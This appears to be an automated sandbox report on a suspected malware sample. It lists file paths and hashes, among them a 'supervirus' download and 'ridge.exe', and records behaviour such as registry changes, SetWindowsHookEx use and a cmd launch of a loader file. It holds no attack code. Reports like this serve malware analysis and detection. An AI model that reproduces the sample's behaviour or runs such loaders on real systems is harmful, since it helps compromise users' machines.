| SHA256 | 34799731ed8e1db5e5f8ae0856bbb40e90433d363525d74e3fa6b543a4ddd474 |
| SHA512 | baf8727282bef4431929d1057d714eed562d8a98a9a3be8cbcdfb637885101aae015193b91022e2c91ac866e1aeec5cb136ee5b7fcd73d4d5e7b3ed2a2a7d24b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\prefs-1.js
| MD5 | bfbf39db2124dbacf55a580cf73631bd |
| SHA1 | 09d4051b4ee069a9ae599866d722ac4dd2327fa2 |
| SHA256 | 175395af9614271bba6a84d2714f02c80b19790de23a950e4667f2032b19bb03 |
| SHA512 | 47f95f5f057f23d7c00b7acbe09106a8b2f48d9eea5e878c15b95f53a6fa920d7a0632efa5acaca7bf6b7dffe8a86d8d39e6dbca35e2e003e3c45b4f65ab1b4b |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\8B1905E77949FF7F0809A55B15A5B04670080E70
| MD5 | 4486ea097062f631ca7eb1a8c11eaccd |
| SHA1 | cf010e6b11306c01a6c951c32981475c328d3fc3 |
| SHA256 | 2d0d35fbea3ae1b5845f671bbd4f294c089ddb06f734bf61ad46a81ca66eb678 |
| SHA512 | 12443f6fe0828a6b9181da6a5b3a679a5b528e1e43a631187f250035c83b9d8bd50cb267716be4fdb4a285cb1a9d7303a9067c60290720490d183efbc6d2b516 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
| MD5 | 3d33cdc0b3d281e67dd52e14435dd04f |
| SHA1 | 4db88689282fd4f9e9e6ab95fcbb23df6e6485db |
| SHA256 | f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b |
| SHA512 | a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
| MD5 | fe3355639648c417e8307c6d051e3e37 |
| SHA1 | f54602d4b4778da21bc97c7238fc66aa68c8ee34 |
| SHA256 | 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e |
| SHA512 | 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c |
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | 85430baed3398695717b0263807cf97c |
| SHA1 | fffbee923cea216f50fce5d54219a188a5100f41 |
| SHA256 | a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e |
| SHA512 | 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\94998847A92A9F838DC313AC0E131747BFDC8109
| MD5 | 8657aaf071d9a3087ea5a306d4faeea8 |
| SHA1 | a4045b4633579ec4434bdd59ce35019d20f13951 |
| SHA256 | cba698878eb67cfc023382b91d31734e3ffb62ef402dfbf3c9d17036b0400a14 |
| SHA512 | 51a0d78a202a2b282f34aa1792c3c699d1c3267dc3fbd1dea9d3b5ef8316c6e8dbebdf0f13a796155ea188385819664a8b2c95335e636152de30312bd22fc558 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\doomed\15458
| MD5 | 411ecab164aaca8446d2f0a5bace9b5e |
| SHA1 | 9d2a60fb0e1cec1e85b38a9eab24a7c5a3bbb323 |
| SHA256 | 8d13a658c13a03682fe1ada9e92eb5ab3ba9004516fb871222a73ce5cd3cae84 |
| SHA512 | b7be2500f7654f0daf90050da0494c2f85b65ffbf4e0d0253d994cc228082dd6a91531bedd2567c061dca8c49673fff88f0f1c4efd3573dbb5144d67577bf2ca |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\7AD030DE8DBCD00C8202B93033C0AAF9BA50CA8A
| MD5 | b5f83dc9a2bc7ac2ee11b5e79159f18a |
| SHA1 | d50a57ef5d51ff1bf8afc0db8febeaeaba4228de |
| SHA256 | 305b729f3dddea616959ba079eab1905f1003371f890bd12b8828b6bf6ae0e7f |
| SHA512 | 9f60af59fe4c83beb7065068eb406b786cd4d22ae093ae0e8c8231d4201c6479c765d27a388ef3f7478a53c5b1995f69f8b4c48401909fea38887067d1395f4e |
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
| MD5 | a01c5ecd6108350ae23d2cddf0e77c17 |
| SHA1 | c6ac28a2cd979f1f9a75d56271821d5ff665e2b6 |
| SHA256 | 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42 |
| SHA512 | b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
| MD5 | 937326fead5fd401f6cca9118bd9ade9 |
| SHA1 | 4526a57d4ae14ed29b37632c72aef3c408189d91 |
| SHA256 | 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81 |
| SHA512 | b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
| MD5 | 688bed3676d2104e7f17ae1cd2c59404 |
| SHA1 | 952b2cdf783ac72fcb98338723e9afd38d47ad8e |
| SHA256 | 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237 |
| SHA512 | 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
| MD5 | 33bf7b0439480effb9fb212efce87b13 |
| SHA1 | cee50f2745edc6dc291887b6075ca64d716f495a |
| SHA256 | 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e |
| SHA512 | d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
| MD5 | 8be33af717bb1b67fbd61c3f4b807e9e |
| SHA1 | 7cf17656d174d951957ff36810e874a134dd49e0 |
| SHA256 | e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd |
| SHA512 | 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt
| MD5 | 49ddb419d96dceb9069018535fb2e2fc |
| SHA1 | 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6 |
| SHA256 | 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539 |
| SHA512 | 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\doomed\12757
| MD5 | d2df54ae8435e7812cb94b0e6eeffad6 |
| SHA1 | 3d705ca0dbfbcc1e6b03666b356f9f528e15dfdb |
| SHA256 | 301e70a0eb95cd4f4fed678e76719e3c00c54d08c74952a7bff466f9dc497058 |
| SHA512 | fb3c464ca6e0d73a4a96914d688b854b8ab0630cfbcd0dabae62ec71388c60195189b46506e49a627221aa42e2913a0c3c5fc6bdcab343cb42e6d894f108805a |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\513EF9647CC170C0340E85A19567EC546F93C6BA
| MD5 | b8e1efda543e2450fdcce16bfafbdb62 |
| SHA1 | 7ce66fc29b879f7f8bc7a5217f9392a1e2f61553 |
| SHA256 | 8dd58ec2c8aaa22a855412f3c54b976f986f11c99b8b67e5c6b32d4b2f9653a0 |
| SHA512 | 1deae8e3ceddb555cdf2808c5f483ab6876e88ae02f063621d367281450d149b84266a31ec14c230355eadfb1ad6e76b715cfed225ebdf72615c86a4541a3c42 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | fd4085c72db721c872a09d74232f6b26 |
| SHA1 | 64dd3cbe3b7c019023e94742e0615739f722dc9d |
| SHA256 | 2fecac1ae59598decd0b928cd34017acb833b7e6be758d7bf663b6dacbba3c1f |
| SHA512 | a1256dd954ba62a025867643b99e3f53b0047af4e7cf019f00a71c2b7c0b754e28e93bf522bd80dc89e77884d10964e3b31ba91936a551e293ca142ec7eb98b1 |
C:\Users\Admin\Downloads\supervirus.0m0wYdWT.zip.part
| MD5 | 426ff666b84f19c11b78bc89ce233362 |
| SHA1 | 9971d71239b7ceab1c1553a437fab5442ea05df3 |
| SHA256 | c81cd237399790fbe008343a0defd701428bbdf072e17304e2e6179d701f01e0 |
| SHA512 | 1cffab7e3f7f78132d4ad9ff158ce4e704b60393a2c2e20ad00694df6845bfa6bad188384cac8a275964131e5f0e75aab19edc403f4f43f98403bac6875a8ebd |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 8f87c7d6bb3e751e3edd7790af8a5b80 |
| SHA1 | ea437ecbc8de3d3f27595dafee05c777684dbdf9 |
| SHA256 | 39262169af35252c546912066433d073cd02cb53398e2d4b85bb82b470d560f8 |
| SHA512 | df971fba21d97d4a58b4d3058b9d96d31bbe23e295027a6d6caae1d44099b5367e86f0a2b8a598cd59cea22770e4099f6735f8a448e11c6601223265b01d4b92 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\E00350F3957C939CD6DFFE4516C46DE6C1A79DD1
| MD5 | 7e8ae9dbbd714ee4145b023e1e7c6a55 |
| SHA1 | d0403841f7434b6bc5b84589517e7cac8de32618 |
| SHA256 | 88f0935b5ad6f7918454d5242bd5b81581f7d1a2c4df4c54b11f3d738c5b345e |
| SHA512 | f791f992c331baf7c51a50fa4fb1fe0bdfa78e14a470651d7b050c3d10e0e0a0a31445f7a7b33853b2de04071d9f64bb49f6d07c8007cae74bfb7d976eb97252 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\doomed\25795
| MD5 | 7d15790520389b213f15f573bdb2de75 |
| SHA1 | 856890070e0bf3636507672225fdffdcc5749cea |
| SHA256 | fdecdf64237513652acf0ef23d84f133a01fd9d477182befad84c1a2f49f38f8 |
| SHA512 | 91d5da40f4b1c2b37c87f0b9ce0f4caf1895b90ff43959ae3a0b27e8abc21c436d1da8b7c3849246db1a87607ae1abdd6e7dfd7f60b314825926a57a89aca459 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 3a23c8cd2b3e3ffde7b441d8720bf316 |
| SHA1 | db1b599656fe2cd9c4968b6787951485daeacee8 |
| SHA256 | b8c38985dd4114133dd0d4bf8a2695cbf0ab4c128c7c415ccf08da9a27f90e4d |
| SHA512 | 7e8a35e87ada4b52f2984dbc83a0b2d8eb99c28bcd08e9c7c5a899a30324dfd5bc7e125b771eb2bd92daf5397eb542b331635b6f32145882a521d80ed77d358b |
C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe
| MD5 | 5ed4728caa339c2a7479102f0c04c087 |
| SHA1 | 20cd453fcac9d9960b0076715d985a55784a6b53 |
| SHA256 | 7160db2b7a6680480e64f0845512d203a575f807831faf9a652aaef0988f876c |
| SHA512 | a521eac0d54fbfb9726fad3fafcd7779d455ca46e065a3eafc1a7883961b061550bab8e93ce576904b6c6b2d25cf129ff3d2437ed26a6033ac7c0b4c628dc865 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 4d398703860cd0e9e329ad3eb26e176a |
| SHA1 | 210f7164732d216eaf512dcaa6f18edd7f996261 |
| SHA256 | a0aafc13e7c64d9d21218b1c0ffcdc5c73aa92b4f94532008dfa4caa4f405602 |
| SHA512 | 5c4cc96e706a19859fef51a63e7d590f04ea0db6c85bf32f4df6d6753dd2721547456612c8c2e6148a73e0abbe7010ae6906d0521aec48ec2ac588b67c01559d |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\doomed\14979
| MD5 | d1455be072a91c6399f7c0faa16781e6 |
| SHA1 | e36c41775cacf93772926945f83783c8f198d69c |
| SHA256 | 42e9f2b701a9f6be65c2c75a118898c09a2713e21cd3cb3c015a4d2ca022eee2 |
| SHA512 | b6951b67fc2cdb98d460ea4168d5380e6127e00b912d45be6df27e195814cd703a2a7e801084a8ca4c3bfc5afab53da9ba957c06c22488bc637762ee1e3c1be3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\prefs.js
| MD5 | de228ced4830b114e4975dcc2009d12e |
| SHA1 | 9c5ed637434260ece4bfa18209508cf79c9c705e |
| SHA256 | 5feebb4669fe726be15da3bb6536f3faea140ce6246847bd3eed783a19a4ed56 |
| SHA512 | d913d418df3650c0e98cba7901406cdbac17a4aa7d8697e8b4919284366fcd827709cb7a4b9e9fe5b3c56f972673abc5a9dd5a5ab6a956989d12262e7b3c13c8 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\5CD1EBDF6B57F13C7E783CE5E6D8E9C44014FE1A
| MD5 | 0c44023b2f63a8d429df578f5e8e3519 |
| SHA1 | dba78cf8750de8df4992b76aaf5658b1f3c9dc25 |
| SHA256 | 8e4907638b2ce90fa8c59ce7740f431a1202b4ff9ce1be814bcbc91ab2b7fc76 |
| SHA512 | 4c87620f5b4ad3331ec49d46783afda98c79fa2ad0d04b7dfcef207b5815f056c5828050e291521eb3f02c7f5cd3a6e221f726d38110228ad744ad673d00927b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\prefs.js
| MD5 | 18ed20d5c9cd1af1a5e9b3d416f30f36 |
| SHA1 | 18d22223d8b3a4c31cc5bbe7d366fb988f04cd1b |
| SHA256 | 9f16ac7b15b9f856595ea702544e141e63fd3b1d6ca76c95caaaadb76d5f920d |
| SHA512 | e9ca5e5fb260a4efc5618f9d3d7a01b3c21cc1d80d0e587acc41990dbae8cae991d505df3c53a8ddeb39dc2c99dcc297cb51bb8b41125333240e0196e5479313 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\prefs-1.js
| MD5 | 861c8bf781c5393014d9fbafa4a23c94 |
| SHA1 | c68012f59a47b28406436289ec0e620804223aa6 |
| SHA256 | e77db40aad68734ad236b705146d1d34f55c29d777d958411afcbff4e17cd4be |
| SHA512 | 21d2ce2210997f753c4e3f343c708ade7a698160820994e9ceb083737831da0a124447219e34d1c2bd3b540fba96664033ad3ea43b22c0316da78d73f80320da |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | 546a12bebccb32dac5cca3214be7914f |
| SHA1 | 744e3cd77189a70871739b4d7320f90ec91bd05f |
| SHA256 | cc767a1ebc6dc79d1626c8c71daa8a6cc8d6c98aee0744ed78feb2f78a5322e9 |
| SHA512 | d06aa4b064be53d7af12e9723a88adf9753ab31153149e63200cd08595f91a17a3b5a475265deaf64a04be1c124dc3126536fc390518071c4df766f9d636b687 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 7eaab5c8d6c05ed8df295b158695470d |
| SHA1 | 78fa59b34bb512feb22deee7de7c4a4c1025b13b |
| SHA256 | f74e8e55d3148c80bef17b2640c337480a09bcb6e1a2ddc68ff03e4a12b87efb |
| SHA512 | 29b82dc545786f7a5ff0119a972694bdaaa9e2bbefc0bd1d2aae62f941ec3b897cd8f514d5a87b7db7893f1eec68e9a4caf64533f067e397a4b56f5a39fb18d3 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\doomed\29289
| MD5 | ecc3c150790ec53d43d592bd14342f3c |
| SHA1 | e85dc2c81bec02fb320a6a58a8b5ef05e150e243 |
| SHA256 | 8f42012f13a8d4472fde789561cd01a317064a37aa9d43128304e484d5d83be4 |
| SHA512 | 36477b64d8e8c663e3bda18a259a5b4c4cc6fa86f6ce4fed3abdfc50c127d7ef878187d287ee631dfa79c0545469beaafd2f8e4e75e6a67ec498e8b58caf3642 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\042C660BA4291440397E6C82873F32C9B8F4549B
| MD5 | e6538fe457ccb6b129adb92c948152e5 |
| SHA1 | 458d7cea585c6dfd0696741b31ec75a2b04298d3 |
| SHA256 | 25ba6d368e8c1b56b094ce2142d6ac9444d6f9b676294d9e97017e17d572f95d |
| SHA512 | 95207793c6c039965f9773eac32d532dd5154f3bf86d8f7be9dcb4bd987f8ce4ad30eee9c2970e0940e8e357620e43658aaa0bca340bfd8975a9827122be8255 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 53e53663adc357e7e7e6d00fe4e189b5 |
| SHA1 | 363abbf6a3f696283c1692449e1734d7d885ef9e |
| SHA256 | 2ed3639dbc1110fad099513e00352b2e1f7f9bb32cc5c1f49a3a61f5e4561856 |
| SHA512 | 33f43ea5842b9d66c93176f92d7bb79052bf855958f39485da7af1a536ee9ac2f24396d8454b9f83ea37a882b039be8593070468437743b8da088e7b59b1c4c5 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms
| MD5 | 6365ad38da2d5697a2267a2a509514b1 |
| SHA1 | 3564342b1312e16ceea42b5066098c03a910dcd9 |
| SHA256 | fc86500788a85c821e24db83d31b0729930c3122f3c287249ec7342f70e7ae9b |
| SHA512 | 645b30e60dcd2032abb5af7ee3d6e0279a785d276e6988b63fe7adcd947fa90e03be115b2f1c08184efe13241fdfddc8cf4f4b706c66599cfea5acd5b1fb13ce |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms
| MD5 | 60c604bebb951063315ca9ec7a75bffe |
| SHA1 | 04404743c8c52784e5d1e7d0597f7a2ee7e5525d |
| SHA256 | 15e9ca8ebb373a65369b28f20d18e46f8e8d05df1d4ce0c300f3f7a7c36a439c |
| SHA512 | 4830d43e0dff0afb6d7aac4f73aa96ff5f01b2ab4e98c3363f77b085ec3b304be33d3a146cf575f4390db3f8dcd3e1c08cf0ad6d30c378997414100f07477977 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\doomed\25343
| MD5 | fa1db6abc054e10810d1dbc13499ceac |
| SHA1 | 18fdf26433eb528deda7ecfbeb6aa701734cf183 |
| SHA256 | f7dbe5d476081831e0f097eb247e50224abdebc916e4d9d2f2c0e96cb37e93e9 |
| SHA512 | 718737124206c2324482408b1ad9e3d21d42069fd5d8fb16b6870a1b54ffd3aee0aae45d26013c41afafb53aa17a6e9400f93a173eddbd85d07920f0a2feed7c |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-27 20:20
Reported
2024-06-27 20:23
Platform
win11-20240611-en
Max time kernel
146s
Max time network
150s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\TTYD_EU_REL_Loader_v1.gci
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding